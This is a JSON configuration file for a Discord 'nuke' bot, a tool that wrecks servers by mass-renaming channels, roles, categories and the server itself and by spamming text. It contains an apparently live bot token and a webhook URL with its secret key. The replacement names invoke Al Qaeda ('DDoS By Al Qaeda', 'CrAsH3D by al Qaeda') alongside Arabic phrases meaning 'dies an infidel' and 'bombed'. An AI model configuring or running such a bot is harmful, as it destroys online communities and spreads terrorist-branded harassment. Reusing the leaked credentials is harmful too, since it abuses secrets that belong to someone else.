{
	"token": "MTI0OTA0MjQ2ODExMjk2MTY1Nw.GjBOGQ.K7GVxgpda3huEXYxWFcumZWBxyjtNXZiGwuB-s", 
	"prefix": "?", "command_cooldown_time": 10, 

	"loghook": "https://discordapp.com/api/webhooks/1105189152628158585/0gU-A80873sYOhlcUUsZqJx39FaGXy6qzy4pjLuRp77ZChgtDtrTkl7QNuZrKYMvFAoM", 
	"logs_output_type": "console/webhook", 

	"nuke_channels_name": "يموت كافرا", 
	"nuke_voice_name": "يموت كافرا", 
	"nuke_categories_name": "DDoS By Al Qaeda ☠️", 
	"nuke_server_name": "...<<<قصفت>>>...", 
	"nuke_roles_name": "قصفت", 
	"nuke_webhook_name": "CrAsH3D by al Qaeda", 

	"nuke_avatar_file": "avatar.jpg", 
	"spam_text_file": "spam_text.txt"
}
